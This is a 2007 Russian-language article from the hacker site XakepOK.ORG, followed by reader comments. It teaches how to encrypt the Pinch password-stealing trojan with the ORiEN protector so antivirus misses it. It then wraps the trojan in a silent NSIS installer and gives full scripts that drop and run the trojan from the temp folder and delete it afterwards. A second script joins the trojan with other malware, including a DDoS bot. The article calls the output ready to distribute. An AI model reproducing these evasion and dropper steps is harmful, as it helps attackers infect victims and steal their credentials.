Криптуем файл паблик-крипторами. » ..::XakepOK.ORG::..
XakepOK.ORG Logo
    
ГЛАВНАЯ  |  ФОРУМ  |  НОВОСТИ  |  СТАТЬИ  |  РЕЛИЗЫ  |  E-BOOKS  |  СКАЧАТЬ  |  WEB-TOOLS |  СНИФФЕР  |  ЮЗЕРБАРЫ  |  О НАС
Последние темы с форума
Название темы Пользователь Просмотров Ответов
Super Bluetooth Hack v 1.7 RINGER684
интернет через мегафон RINGER48010
Кто знаком с ICQ Password Recovery RINGER2969
Оценка качества создания сайта XAKEPOK.ORG RINGER152318
SMS BOMBER v2.0 (флудер мобильных телефонов SMS'ками) RINGER8078
kbot (Irc Perl Bot) Weeeeee81
LulzCrypt V2 Weeeeee561


Криптуем файл паблик-крипторами. Категория: Статьи » Разное

3 ноября 2007 | Автор: nexgen | Просмотров: 995 |
Криптуем файл паблик-крипторами.
В этой статье я расскажу Вам, как закриптовать троян или склеить несколько exe-файлов вредоносного ПО подручными средствами и избежать его детектирование любыми антивирусами.
Рассмотрим скрытие от антивирусов трояна  Pinch, как наиболее часто применяемого на территории бывшего СССР да и не только.
Из подручных средств нам понадобится протектор ORiEN и система для создания инсталляторов Nullsoft Scriptable Install System(NSIS). Выбор именно этих средств обусловлен малым размером приклеиваемого стаба(что сказывается довольно малым увеличением, а с учетом компрессии зачастую и уменьшением размера криптованного файла по сравнению с исходным) и их бесплатностью.
Итак, начнем.
Сначала скачаем и установим вышеупомянутые инструменты с их официальных сайтов:
ORiEN
: http://zalexf.narod.ru/
NSIS: http://nsis.sourceforge.net/
Затем запустим протектор ORiEN
С помощью кнопки Обзор укажем путь к пинчу. Затем перейдем к вкладке Пароль и установим его чтение из командной строки. Затем введем в первое поле ввода любой пароль(главное не забыть его до конца процедуры криптования) – им будет шифроваться наш троян. После ввода пароля чекбокс наротив поля ввода станет активен – отметим его.
После этого станет активен другой чекбокс – Защита по паролю. Его тоже необходимо отметить. После выполнения этих операций нажимаем кнопку Старт. Теперь желательно протестировать зашифрованный файл. Для этого просто запускаем его и если появляется MsgBox с сообщением ”Неверный пароль”, то криптование прошло успешно.
Теперь можно переходить к следующему этапу – созданию инсталлятора с помощью NSIS.
Создадим текстовый документ и вставим в него следующий код
&lt;br /><br />
OutFile "crypted.exe"&lt;br /><br />
SilentInstall silent&lt;br /><br />
Section "crypt"&lt;br /><br />
SetOutPath "$TEMP"&lt;br /><br />
SetOverwrite on&lt;br /><br />
File "C:\Documents and Settings\adm\Рабочий стол\pinch.exe"&lt;br /><br />
Execwait "$TEMP\pinch.exe !psw=123"&lt;br /><br />
Delete $TEMP\pinch.exe&lt;br /><br />
SectionEnd&lt;br /><br />


Теперь необходимо немного отредактировать этот код.
В строке File "C:\Documents and Settings\gol\Рабочий стол\pinch. exe" должен находиться правильный путь к зашифрованному файлу, полученному с помощью протектора ORiEN на предыдущем этапе.
В строке Exec "$TEMP\pinch.exe !psw=123" после !psw= должен быть указан пароль, которым мы шифровали файл. Сохраним созданный текстовый файл.
Теперь запустим утилиту MakeNSISW соответствующим ярлыком из меню ”Пуск”
Перетащим туда созданный текстовый файл. Если все сделано правильно, на рабочем столе должен появиться файл crypt.exe, который можно спокойно распространять.
Также NSIS может использоваться в качестве неплохого джойнера. Для этого в скрипте инсталлятора необходимо использовать директиву File и Exec вместо Execwait несколько раз.
Например чтобы склеить 3 файла, скрипт для NSIS будет выглядеть следующим образом:

&lt;br /><br />
            OutFile "joined.exe"&lt;br /><br />
            SilentInstall silent&lt;br /><br />
            &lt;br /><br />
            Section "file1"&lt;br /><br />
        &amp;nbsp;    SetOutPath "$TEMP"&lt;br /><br />
        &amp;nbsp;    SetOverwrite on&lt;br /><br />
        &amp;nbsp;    File "C:\Documents and Settings\adm\Рабочий стол\pinch.exe"&lt;br /><br />
        &amp;nbsp; Exec $TEMP\pinch.exeSectionEnd&lt;br /><br />
            &lt;br /><br />
            Section "file2"&lt;br /><br />
        &amp;nbsp; etOutPath "$TEMP"&lt;br /><br />
        &amp;nbsp;    SetOverwrite on&lt;br /><br />
        &amp;nbsp;    File "C:\Documents and Settings\adm\Рабочий стол\wmtroj.exe"&lt;br /><br />
        &amp;nbsp;    Exec $TEMP\wmtroj.exe&lt;br /><br />
            SectionEnd&lt;br /><br />
            &lt;br /><br />
            Section "file3"&lt;br /><br />
        &amp;nbsp;    SetOutPath "$TEMP"&lt;br /><br />
        &amp;nbsp;    SetOverwrite on&lt;br /><br />
        &amp;nbsp;    File "C:\Documents and Settings\adm\Рабочий стол\ddosbot.exe"&lt;br /><br />
        &amp;nbsp;    Exec $TEMP\ddosbot.exe&lt;br /><br />
            SectionEnd



Если будет необходимо удалить файлы после их запуска, то желательно использовать Execwait и Delete.

Теперь о размере закриптованного файла:
После конфигурирования паблик-пинча от Vaska он имел размер 50 кб в несжатом виде.
После криптования пинч стал весить 65 кб. По сравнению с криптованием протектором типа Themida, где пинч увеличивается в размере с 50 кб до 380 кб описанный способ имеет неоспоримые преимущества. Увеличение объема файла вполне соизмеримо с результатами работы приватными крипторами, актуальные версии которых доступны далеко не всем.


          Комментарии: 6
#1 Комментарий от: Pitkes

12 января 2008 17:49 | ICQ: --
Столкнулся с проблемой после перетаскиваня текстовика в прогу выбивает ошыбку:
Changing directory to: "C:Documents and SettingsccccРабочий стол"

Processing script file: "C:Documents and SettingsccccРабочий стол111.txt"
Invalid command: <br
Error in script "C:Documents and SettingsccccРабочий стол111.txt" on line 1 -- aborting creation process

Что делать помогите!

Сдесь есть модеры или ещо ктото кто проверяет коменты???Если нету то я обращусь за помощью к другому сайту!
#2 Комментарий от: cvas

19 июня 2008 21:43 | ICQ: --
У меня такая же проблема. Не знаю даже что делать
#3 Комментарий от: Senatorr

16 июля 2008 11:51 | ICQ: --
я убрал это он закриптовался!только не работает пинч потм am

/><br />
#4 Комментарий от: NetworkTerrorism.Com

28 июля 2008 20:40 | ICQ: --
NetworkTerrorism.Com
#5 Комментарий от: cccp

16 августа 2008 08:34 | ICQ: --
Мой адрес Советский Союз
#6 Комментарий от: алексей

27 октября 2008 08:16 | ICQ: --
получилось :O

Добавление комментария

Ваше Имя:


Ваш E-Mail:





Капча:            Включите эту картинку для отображения кода безопасности
обновить код

Введите код:

Навигация
Главная
Форум
Новости

Статьи
»Web-hack
»ICQ-hack
»Cracking
»Кодинг
»Соц. инженерия
»Разное

SEO
Книги
Web-tools
PHP-прокси
Обмен файлами
Сниффер
Информер
Генератор юзербаров
IRC-канал
О нас
Вход в систему
Логин:
Пароль:
 
Топ новостей
» WiFi-сети взламываются за 15 минут?
» Президентский спам по-американски
» 19-летний саратовский хакер отделался незначительным шт ...
» Отчет о работе ботнета STORM
» P4P оказался почти в два раза быстрее P2P
» SMS-мошенники выдают себя за сотовых операторов
» Вышел релиз ReactOS 0.3.7
» Хакеры взломали платформу Google Android
» Microsoft пообещала умерить «аппетит» Windows к аппарат ...
» Sun и IBM займутся популяризацией формата ODF
Опрос
Кто такой по-вашему хакер?

Это - Я!!!
Жаждущий знаний
Преступник
Ну я даже не знаю...
Герой нашего времени
Сесть мы всегда успеем


Друзья сайта
..::XakNet.Ru::..
..::GraBBerZ.CoM::..
..::Illmax.ru::..
..::qseZ.ORG::..
..::Tolpa.ORG::..
..::ProLogic.ws::..
52Nn TeaM
hacklab.org.ru
..::web-a.info::..
Indetails.info
.::VzloM.IN::.
Evil Forest
.:BlackHack.Ru:.
Планету-хакерам
...::ICQ Primary Base::...
TGBR Community
Ссылки
Счетчики:
дизайн сайта: Rock Technologies — достичь вершин